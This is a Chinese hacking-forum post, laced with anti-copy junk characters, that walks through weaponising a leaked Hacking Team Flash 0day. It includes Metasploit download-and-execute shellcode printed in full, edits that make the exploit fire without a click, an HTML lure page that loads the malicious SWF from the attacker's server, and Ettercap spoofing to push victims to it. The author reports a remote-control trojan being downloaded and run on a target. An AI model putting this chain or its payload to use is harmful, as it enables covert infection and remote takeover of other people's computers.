找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1599|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, P8 U1 ?7 m( ~ 三、flash 0day之手工代码修改制作下载者实例入侵演示 ! e6 L. ?. u5 C: k; [0 \0 y

: \( V5 K2 b h3 o6 D

! j$ L( e; ^9 s1 o1 ] 利用到的工具: 1 c6 N6 y, C1 A4 c8 x, F% j6 C

* a# B3 S; ?) y7 J; G. ]2 h$ [& ~

$ G: V: m: j0 V Msf 4 H' E, S9 `- Y0 K3 T+ A6 Q/ E

, p' g3 L2 |+ W

: Z+ C' R: E- e! ^ Ettercap 5 f, L. ]+ f- V% g+ ]) v

2 r: ]1 c+ P# h

W* k! I2 q* v+ w8 N$ D/ I, n Adobe Flash CS6 # ?+ \0 N. ?# P) x, I4 ?

, T' f* V" j; P1 c Z8 W" q

, H2 H6 X. x& H; w/ y Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 9 z( h1 M E6 [% f* w

! R# q9 s5 y3 Q7 L: U

, a B1 |4 J5 O8 p% {8 U4 y5 I 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 8 x$ ^1 \; e5 U* R7 Y* x. t: Z ?: Z

4 K! U1 B; H# g! [) e4 G

|1 |4 s; j' V, W8 j' M7 k0 t' e 如图: * E' a' ^6 i+ N/ ]' M* _% {

5 k0 y( @! e B# P( {$ Q$ N3 J& b

( A/ S7 ~% H) J5 E5 V8 y   ( P6 ^! t7 T I" f$ U

. W4 o. j" v# r1 b: o, E

2 X4 y5 w* {- A) p7 D   $ O( C% Y" {1 O% S

3 O% n, o. H& H: x( r" G

- T6 |9 t0 n9 v' D 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: / O* `8 f; r, n- q, I. S

7 ~+ X3 F& x0 o4 l3 h8 y0 t8 K

& \* T5 K: P& z7 A9 |3 T! a   * X! r& p. q( R2 y4 z% g

# ~6 V9 T/ l$ W- t: }$ V

$ {2 m9 q6 `. ^8 R T+ r   & Z" o) ~$ o) n! }' R% B% C

1 {, ]5 h6 y2 g1 ?

: z$ z4 a) ~& g* U& D2 T8 R 然后执行generate -t dword生成shellcode,如下: ; ~: p- L; C/ X$ C9 ?! d

2 [* W# B8 U1 \3 J

; f( v( v8 g. D   6 B/ r5 Q" C$ S

; n2 k' ?2 f u7 F4 V. [: R) ?

% c' O: u2 Q; c3 `$ g: z9 B 复制代码到文本下便于我们一会编辑flash exp,如下: * T9 u, ]2 A" n3 L# p

. C' f7 ? W5 k

. \7 G" ~6 G z! M5 @ 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, ( d8 U. o3 \" H) c+ z/ ^( P# w

% P$ G8 \) b0 k% V0 O& i; i( u. T

6 \. U. y; X, X6 n1 n' R1 h1 v% b+ T 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 8 [; W4 i/ m5 K% I/ @$ V- }: m

\4 y5 a0 f$ ?6 i

3 T3 Y* D. }9 @ 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ) b) Q( d8 j u3 j7 v; i2 A

2 w E* l! }7 h6 F

7 E! s& W; K7 {: r0 l 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 2 y8 @- O* V+ t+ [- x1 n( a' ?

/ m) A" I2 H; r& |

1 z, W6 F6 @3 A( P y; _0 l 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, * t# b9 ~/ f) g ~* N) ~- ?

& g! j. E% R8 g

+ K4 x$ D$ H$ @8 S' T2 n( [ 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, - z' e4 p- [3 F. b" {

, W; O5 s8 `9 u4 l* h

, L; {; [% ?# B( K6 b2 Q 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, F5 ?0 q5 _ e5 l+ A0 q D

9 N: \6 T( m" }0 n

( @" f* L3 o" R1 }' u 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 9 M) X) {/ x6 S. }3 N+ r. y3 s

# B3 T1 W3 G: }

- J! z2 @7 u. w+ }# A 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, . Y8 N2 V5 u& @9 u$ `

4 [; m% ]# z' ^2 F5 T

4 w3 ^. a6 M, z0 e6 j" n0 V+ r) | 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 2 c! h+ u9 ^. ?6 Z3 G

3 D! A* O$ q8 o7 f

: x' {( G1 U9 b; o( L1 s# r 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 1 t5 a( _6 R! G- a5 k+ X

3 O& A% f$ {3 c! l

8 P$ X, t7 z( O# I( |6 r 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 5 P' n5 o% [+ }8 L

: |& ?* |4 E7 X7 }5 U

% k! T/ ]% p% C/ ?* [: ?" S 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, : i. O+ C; u ?5 i! h

; a% g: z( W. l7 g m

' x7 g8 f1 J7 t+ F 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 l9 i% v$ w& g1 g a

- G, I% d$ ~: H5 B, K" ]

8 e$ e/ V. w3 x" X) W% l   ; u: o/ b0 W5 `

$ O: w( c9 S: g6 \( I# O' W

2 f( ]5 D& V1 A D   - o6 y; _! L, {5 [6 i# M1 O

) B; M3 x9 ~9 n7 O: T8 ~' ~5 v

$ G9 v) C, E2 B; Q- K$ u 下面我们来修改flash 0day exp,需要修改三个文件,分别为: ( t, o! K& t; T' d+ R1 l) q

/ m, ~0 v4 @$ D/ G) m2 m7 v. I

. b5 v1 {* S9 c% B& T3 _" C   , N6 {* e; u+ \! S* e+ f

! c! x0 J& p6 ?9 T" R; z E4 o- Z

2 i' i5 F3 P+ B. U 先修改ShellWin32.as,部分源代码如图: 3 ?# T2 `9 |# n4 a |

) F- O+ i# b4 z

9 T. }5 W- |, k$ \# x   2 J8 ^# b! _7 ]$ k1 J9 q1 W0 O

; b# y. D' [% V2 W% X4 \

) S. b$ u% c+ i! f! A: `/ K 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: $ u# M! @! @0 H, z4 S x

- I4 l. M& `( L& i p6 n5 F. i

( v' E- d" L, [$ S2 \( d& \   ' G4 c- u4 z3 w/ `

' @8 p. B: Z8 L' S

K" R5 S- @: N: T 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 9 w" x& L" Q2 R. [$ a# J

3 Q) V& g( _, x" J. R) S- {2 a4 I

' G$ c2 | P6 D. k. K% H; H5 S/ f; [   ; X/ Q+ w4 S7 @$ V8 p

4 p- e* `6 A4 m

6 Y/ R! L7 J" b7 b# o7 c# v& o 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: & `9 C; _/ D7 j+ @7 }

# P7 Z& r5 [+ K

. R$ b5 A6 c. i4 W   H! p2 \5 h: V' H8 m* q2 j

: P. D1 u$ A2 F% R9 a4 N' h: i

2 `; c& g L7 n7 _5 A( ~& |9 C   ! O- P2 K3 S+ x

: z& ]0 r6 y2 M8 V! X/ C

1 b% j6 f5 P2 }6 \! n, ]7 u% S   - g/ A% D9 R0 n7 a% `5 a8 P2 s' `

0 c" k# r ?8 C% K4 U4 d

2 b1 J) H J$ ~6 f! m1 e/ E 然后点保存,下面我们来编译一下,打开 7 K0 v' F/ Q) q, r V( ?7 ^

; k v0 d& ~* _2 i5 f* T

+ m+ J, j% W8 C. `2 H exp1.fla然后点文件-发布,看看编译没错误 ( a7 L2 {' f* F. o

2 C( G6 l1 h" `) u1 c$ x Z. i

% F8 }) s ]; e: P2 k ?0 p   ; D% I1 P _) f8 b

& Y2 B+ h& j1 @# b6 c

) B6 h% n5 q5 @& y" r, Q, z1 q' T   8 [4 E$ z# i6 o# [0 L# j

* ^; n" [8 j i3 t8 ?

. a5 j( m; E0 C* {- }7 e% ~# Y   & t1 ]' J$ ] Z) m! l" j

( Z, R5 U$ v- k% ~9 _; p

, ~4 n2 B% p& H, K+ S8 ?! F   2 P0 [+ b2 K& E6 B9 Z7 n

" E# ^/ f3 a* U0 C( x

* a# t! b; o0 ~- A+ ~) \6 t; O8 G" I- U 然后我们把生成的 . W. h# _7 B+ }3 r0 F/ c. o& x

0 h1 g$ r, p$ x1 P5 ~

1 b4 G, |: i* Z2 W( Z exp1.swf丢到kailinux /var/www/html下: 8 l, R9 I' y9 T7 s4 k

9 _" r) s) d: W7 W% L" K

6 h8 a& A, k+ l" e3 v0 s2 Q. C 然后把这段代码好好编辑一下 # q3 ^% @% M0 I% z: o% Q2 L

$ t& c9 d( L- D

7 a# d* D4 m5 {   3 ~; u/ K0 b; x1 E8 L' s1 Z

! _# V1 j/ O, |: d3 ?$ f8 Z! I0 L4 }

$ H* T/ ^1 H) u+ \, q7 R* A   : h! ^) Z7 ? k/ K7 Y

7 x; v$ Y+ z" C; R6 N& A& e/ f* n

& S; n+ I2 I4 r0 @: w   0 s( `3 b3 K3 ]3 v2 I1 t6 ?' _5 l

8 e( P6 T$ m/ J4 q& x

! b V, @" f2 y" `   ; e' r% Z9 r: {; \1 \5 } `' P

5 }! i0 T/ ~0 c5 x

% A% ~! O3 c- {) r1 s! k# A   0 u6 u7 }2 {! r3 H& X

4 M; V' m C; {) u

$ Z& Y$ v2 ~* h' C; y7 H   . j7 `7 `8 q; _+ J( {

; p/ C c( u l/ N$ Y. O. {8 V0 F

5 r" `1 o9 I5 q) s <!DOCTYPE html> ! D# J- S f& G" D9 A6 k/ {% s

- H& a& \0 Y4 ], G

( N+ h1 q, @1 ]3 {3 v" @ <html> # P8 d# W* i$ C

) @6 N! C( a3 ]! l) D. Y

/ E2 m7 F! ?; W! t/ v! i4 K <head> " ]7 Z) b7 K0 N2 L/ r

8 Q' r& ^% d" B& J1 h

* W! b' C" K. F+ g <meta http-equiv="Content-Type" content="text/html; . w* q8 {7 o6 d6 G& k _1 K

' D" \5 c1 T' y9 v# \

{7 Q. K2 j. {( `3 V8 |/ [. i charset=utf-8"/> ' S0 |" Z8 V& P: ^( z) {

* ~( W% W# j* Q

; d! I4 k" ~8 J5 r8 T2 Q </head> 9 c3 n8 u9 z1 p' h& b3 B' Q/ O

, `+ \9 A) {. ~

/ Q+ [. P# z8 E+ W9 v0 K' \2 t <body> * E4 f k; _( ~; K; n7 O; {0 g' V

/ L, u) ~2 s, b1 z& f8 H8 j

: u8 G0 V, w0 B8 } v' J L <h2> Please wait, the requested page is loading...</h2> 1 M7 N. ?, g' P9 o4 z- b( z

/ v1 z& T. \2 v7 C6 K. p

! f! l2 J% M$ ?6 d; l <br> 4 @1 w0 A) I& J

5 U- s% _8 U& E% c

# x4 v) S- F6 S1 Y' h4 B" B <OBJECT ; K* X8 ^4 \$ C$ g

2 E* I# Q+ \2 {, e8 y+ A

8 T* r$ f5 @, Y& g Y) x, i8 Y classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie ( \1 ~( r* N+ _: ~

8 s' I$ |5 ?' d

" d8 Z3 v& c4 v: A VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 8 ?* R' ~, X- O/ z

3 g' h% u* n* j. ]% {; @9 k

T, I3 ~1 D0 ^# g2 _- J2 e </body> 3 b* G7 Z9 d7 z

+ V2 u8 w3 y7 b$ q+ ~# K

- E* h, f0 O6 S0 @9 @7 N. m <script> # L0 b* d* p) W

9 k# `( x! I+ P$ t6 ~; U! W" G

( L: r! r. L) E, D     setTimeout(function () { 6 a. Q" P; L' o! J9 @" |

: h* }. u" E3 k+ D

6 l! a' B- z' `1 G3 r! ?2 k) j          2 A( }& E2 U- L( N. L

& P5 W) ~; H) P/ d9 c+ B, [, r- j

; h& q! I7 o( |' d/ L- n window.location.reload(); $ ]5 V! v0 ?+ ?* ^! m; A5 X2 D) K

7 ~ o7 x4 f7 @0 l, u* K3 B6 g

% X3 x: q1 O2 @( B! I     }, 10000); " H7 e5 [ {% `

8 M/ O5 s/ T1 {

" o' Y. T. ?# E4 c   " Y5 K3 _1 `' r ~

" z1 V( a+ B5 C4 X

O9 ~. |3 A: @8 b( } </script> ; _8 D0 @3 X" x. o3 Z

. T7 m9 F, I/ e; W% W

) X7 Y3 }! r' S </html> ) m* ?( F! v( V# B# B

% B, C) l9 J# U9 ~ Z6 G- d5 r- p

- g9 n D! d @' Q$ |   4 P( T. \0 A: K0 m5 V* _9 t4 A

' o" D G8 y4 o3 y& w

# t2 T& F, K9 q8 E, S% ~ 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ) S6 S+ @, e* ]- u( u

) r2 |. o; m. A; Y) U- W$ E

s1 D$ D/ @, y$ } R   : I _! V4 b4 ?

4 }& c# a3 j& D6 U" s8 B

1 P: e- G0 ?( ~% _) c# e- W   ; i ]% S# B! k$ n; [

* a6 U& {2 { l! y' g4 O

5 j( h& v% S5 A3 G   # C" p: z) K3 v- `

: w4 g! T. W3 k. c! K( `: g$ x

; p& }5 L8 [% V* j& r$ K) m   3 }- _1 F9 x7 K% L; f* ~4 W2 n

! b+ h& o: X, o/ j

( |( k* @8 u3 q4 F4 i8 E ~   . k, f O/ }" r; m( }* ?- |

0 S, P4 p) D$ W* K" `* z

. D& A2 C& m# A2 J 下面我们用ettercap欺骗如图: " z" M- o0 J* H; K, Y7 B, C# }* S

' Z5 |. ^; i4 k( R# c$ U( z

2 g0 Q( _2 d8 y' d, @! M   ' t: _1 C/ @. B3 j

" P3 z$ K* }. D4 Y2 O

1 W$ X% \$ q' C+ k2 a+ m! c   , O0 D7 p* @ V! r) t

9 v: B2 j. u6 [( d

/ ]( B) _' X6 K$ Z9 K$ b4 S# R& X* v' Z( T 下面我们随便访问个网站看看: 4 H7 l1 K7 Q$ p) ^9 u

5 \6 u9 p, s n# i, `# I% ]! t

' i' l+ N9 p1 t$ b- S; u0 n 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: J _3 a1 M B2 N- z9 E/ K" i

. @) I9 ]8 T6 L

/ B) w, W3 W6 t. f. a* M   - J0 V$ N" v% U) q6 [& |

9 X3 s+ s+ p3 C% d/ d5 q

1 O' D% u! u% f. M 我们看另一台, + ]% n' c$ H9 P6 l7 B7 i

5 A* A/ ?+ V% o0 t; N

* @# c2 X* Q5 t. Q+ N8 t 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 # ?- a; [4 y. \# v) }) [4 N

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表